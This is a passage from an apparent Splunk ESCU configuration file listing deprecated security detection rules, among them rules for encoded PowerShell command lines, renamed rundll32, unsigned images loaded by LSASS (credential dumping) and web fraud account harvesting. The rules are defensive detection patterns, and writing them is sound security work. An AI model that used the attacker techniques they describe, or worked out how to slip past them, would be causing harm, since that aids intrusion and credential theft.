alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = index=_internal sourcetype=splunkd_ui_access server-info | search clientip!=127.0.0.1 uri_path="*raw/services/server/info/server-info" | rename clientip as src_ip, splunk_server as dest | stats earliest(_time) as firstTime, latest(_time) as lastTime, values(uri) as uri, values(useragent) as http_user_agent, values(user) as user by src_ip, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_information_disclosure_filter` [ESCU - Suspicious Changes to File Associations - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There may be other processes in your environment that users may legitimately use to modify file associations. If this is the case and you are finding false positives, you can modify the search to add those processes as exceptions. action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Changes to File Associations - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows File Extension and Association Abuse"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Changes to File Associations - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows File Extension and Association Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area. action.notable.param.rule_title = Suspicious Changes to File Associations action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name!=Explorer.exe AND Processes.process_name!=OpenWith.exe by Processes.process_id Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join [| tstats `security_content_summariesonly` values(Registry.registry_path) as registry_path count from datamodel=Endpoint.Registry where Registry.registry_path=*\\Explorer\\FileExts* by Registry.process_id Registry.dest | `drop_dm_object_name("Registry")` | table process_id dest registry_path]| `suspicious_changes_to_file_associations_filter` [ESCU - Suspicious Email - UBA Anomaly - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This detection looks for emails that are suspicious because of their sender, domain rareness, or behavior differences. This is an anomaly generated by Splunk User Behavior Analytics (UBA). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} action.escu.data_models = ["Email", "UEBA"] action.escu.eli5 = This detection looks for emails that are suspicious because of their sender, domain rareness, or behavior differences. This is an anomaly generated by Splunk User Behavior Analytics (UBA). action.escu.how_to_implement = You must be ingesting data from email logs and have Splunk integrated with UBA. This anomaly is raised by a UBA detection model called "SuspiciousEmailDetectionModel." Ensure that this model is enabled on your UBA instance. action.escu.known_false_positives = This detection model will alert on any sender domain that is seen for the first time. This could be a potential false positive. The next step is to investigate and add the URL to an allow list if you determine that it is a legitimate sender. action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Email - UBA Anomaly - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Emails"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Email - UBA Anomaly - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Emails"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_UEBA_Events.category) as category from datamodel=UEBA where nodename=All_UEBA_Events.UEBA_Anomalies All_UEBA_Events.UEBA_Anomalies.uba_model = "SuspiciousEmailDetectionModel" by All_UEBA_Events.description All_UEBA_Events.severity All_UEBA_Events.user All_UEBA_Events.uba_event_type All_UEBA_Events.link All_UEBA_Events.signature All_UEBA_Events.url All_UEBA_Events.UEBA_Anomalies.uba_model | `drop_dm_object_name(All_UEBA_Events)` | `drop_dm_object_name(UEBA_Anomalies)`| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_email___uba_anomaly_filter` [ESCU - Suspicious File Write - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search looks for files created with names that have been linked to malicious activity. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for files created with names that have been linked to malicious activity. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file system reads and writes. In addition, this search leverages an included lookup file that contains the names of the files to watch for, as well as a note to communicate why that file name is being monitored. This lookup file can be edited to add or remove file the file names you want to monitor. action.escu.known_false_positives = It's possible for a legitimate file to be created with the same name as one noted in the lookup file. Filenames listed in the lookup file should be unique enough that collisions are rare. Looking at the location of the file and the process responsible for the activity can help determine whether or not the activity is legitimate. action.escu.creation_date = 2019-04-25 action.escu.modification_date = 2019-04-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious File Write - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hidden Cobra Malware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious File Write - Rule action.correlationsearch.annotations = {"analytic_story": ["Hidden Cobra Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Filesystem.action) as action values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Filesystem)` | `suspicious_writes` | `suspicious_file_write_filter` [ESCU - Suspicious Powershell Command-Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate process can have this combination of command-line options, but it's not common. action.escu.creation_date = 2021-01-19 action.escu.modification_date = 2021-01-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Powershell Command-Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "CISA AA22-320A"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Powershell Command-Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command action.notable.param.rule_title = Suspicious Powershell Command-Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| search (process=*-EncodedCommand* OR process=*-enc*) process=*-Exec* | `suspicious_powershell_command_line_arguments_filter` [ESCU - Suspicious Rundll32 Rename - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic identifies renamed instances of rundll32.exe executing. rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, validate it is the legitimate rundll32.exe executing and what script content it is loading. This query relies on the original filename or internal name from the PE meta data. Expand the query as needed by looking for specific command line arguments outlined in other analytics. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1036", "T1218.011", "T1036.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic identifies renamed instances of rundll32.exe executing. rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, validate it is the legitimate rundll32.exe executing and what script content it is loading. This query relies on the original filename or internal name from the PE meta data. Expand the query as needed by looking for specific command line arguments outlined in other analytics. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of rundll32, triggering a false positive. action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Rundll32 Rename - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Masquerading - Rename System Utilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Rundll32 Rename - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Masquerading - Rename System Utilities"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1036", "T1218.011", "T1036.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=RUNDLL32.exe AND Processes.process_name!=rundll32.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_rename_filter` [ESCU - Suspicious writes to System Volume Information - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search detects writes to the 'System Volume Information' folder by something other than the System process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects writes to the 'System Volume Information' folder by something other than the System process. action.escu.how_to_implement = You need to be ingesting logs with both the process name and command-line from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = It is possible that other utilities or system processes may legitimately write to this folder. Investigate and modify the search to include exceptions as appropriate. action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious writes to System Volume Information - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Collection and Staging"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious writes to System Volume Information - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = (`sysmon` OR tag=process) EventCode=11 process_id!=4 file_path=*System\ Volume\ Information* | stats count min(_time) as firstTime max(_time) as lastTime by dest, Image, file_path | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_writes_to_system_volume_information_filter` [ESCU - Uncommon Processes On Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for applications on the endpoint that you have marked as uncommon. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for applications on the endpoint that you have marked as uncommon. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Uncommon Processes On Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Privilege Escalation", "Unusual Processes", "Hermetic Wiper"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Uncommon Processes On Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Privilege Escalation", "Unusual Processes", "Hermetic Wiper"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `uncommon_processes` |`uncommon_processes_on_endpoint_filter` [ESCU - Unsigned Image Loaded by LSASS - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search detects loading of unsigned images by LSASS. Deprecated because too noisy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search detects loading of unsigned images by LSASS. Deprecated because too noisy. action.escu.how_to_implement = This search needs Sysmon Logs with a sysmon configuration, which includes EventCode 7 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Other tools could load images into LSASS for legitimate reason. But enterprise tools should always use signed DLLs. action.escu.creation_date = 2019-12-06 action.escu.modification_date = 2019-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Unsigned Image Loaded by LSASS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Unsigned Image Loaded by LSASS - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects loading of unsigned images by LSASS. Deprecated because too noisy. action.notable.param.rule_title = Unsigned Image Loaded by LSASS action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=7 Image=*lsass.exe Signed=false | stats count min(_time) as firstTime max(_time) as lastTime by dest, Image, ImageLoaded, Signed, SHA1 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `unsigned_image_loaded_by_lsass_filter` [ESCU - Unsuccessful Netbackup backups - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search gives you the hosts where a backup was attempted and then failed. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search gives you the hosts where a backup was attempted and then failed. action.escu.how_to_implement = To successfully implement this search you need to obtain data from your backup solution, either from the backup logs on your endpoints or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your specific backup solution. action.escu.known_false_positives = None identified action.escu.creation_date = 2017-09-12 action.escu.modification_date = 2017-09-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Unsuccessful Netbackup backups - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Monitor Backup Solution"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Unsuccessful Netbackup backups - Rule action.correlationsearch.annotations = {"analytic_story": ["Monitor Backup Solution"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `netbackup` | stats latest(_time) as latestTime by COMPUTERNAME, MESSAGE | search MESSAGE="An error occurred, failed to backup." | `security_content_ctime(latestTime)` | rename COMPUTERNAME as dest, MESSAGE as signature | table latestTime, dest, signature | `unsuccessful_netbackup_backups_filter` [ESCU - Web Fraud - Account Harvesting - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to identify the creation of multiple user accounts using the same email domain name. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is used to identify the creation of multiple user accounts using the same email domain name. action.escu.how_to_implement = We start with a dataset that provides visibility into the email address used for the account creation. In this example, we are narrowing our search down to the single web page that hosts the Magento2 e-commerce platform (via URI) used for account creation, the single http content-type to grab only the user's clicks, and the http field that provides the username (form_data), for performance reasons. After we have the username and email domain, we look for numerous account creations per email domain. Common data sources used for this detection are customized Apache logs or Splunk Stream. action.escu.known_false_positives = As is common with many fraud-related searches, we are usually looking to attribute risk or synthesize relevant context with loosely written detections that simply detect anamolous behavior. This search will need to be customized to fit your environment—improving its fidelity by counting based on something much more specific, such as a device ID that may be present in your dataset. Consideration for whether the large number of registrations are occuring from a first-time seen domain may also be important. Extending the search window to look further back in time, or even calculating the average per hour/day for each email domain to look for an anomalous spikes, will improve this search. You can also use Shannon entropy or Levenshtein Distance (both courtesy of URL Toolbox) to consider the randomness or similarity of the email name or email domain, as the names are often machine-generated. action.escu.creation_date = 2018-10-08 action.escu.modification_date = 2018-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Web Fraud - Account Harvesting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Web Fraud Detection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Web Fraud - Account Harvesting - Rule action.correlationsearch.annotations = {"analytic_story": ["Web Fraud Detection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to identify the creation of multiple user accounts using the same email domain name. action.notable.param.rule_title = Web Fraud - Account Harvesting action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `stream_http` http_content_type=text* uri="/magento2/customer/account/loginPost/" | rex field=cookie "form_key=(?\w+)" | rex field=form_data "login\[username\]=(?[^&|^$]+)" | search Username=* | rex field=Username "@(?.*)" | stats dc(Username) as UniqueUsernames list(Username) as src_user by email_domain | where UniqueUsernames> 25 | `web_fraud___account_harvesting_filter` [ESCU - Web Fraud - Anomalous User Clickspeed - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to examine web sessions to identify those where the clicks are occurring too quickly for a human or are occurring with a near-perfect cadence (high periodicity or low standard deviation), resembling a script driven session. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is used to examine web sessions to identify those where the clicks are occurring too quickly for a human or are occurring with a near-perfect cadence (high periodicity or low standard deviation), resembling a script driven session. action.escu.how_to_implement = Start with a dataset that allows you to see clickstream data for each user click on the website. That data must have a time stamp and must contain a reference to the session identifier being used by the website. This ties the clicks together into clickstreams. This value is usually found in the http cookie. With a bit of tuning, a version of this search could be used in high-volume scenarios, such as scraping, crawling, application DDOS, credit-card testing, account takeover, etc. Common data sources used for this detection are customized Apache logs, customized IIS, and Splunk Stream. action.escu.known_false_positives = As is common with many fraud-related searches, we are usually looking to attribute risk or synthesize relevant context with loosly written detections that simply detect anamoluous behavior. action.escu.creation_date = 2018-10-08 action.escu.modification_date = 2018-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Web Fraud - Anomalous User Clickspeed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Web Fraud Detection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = 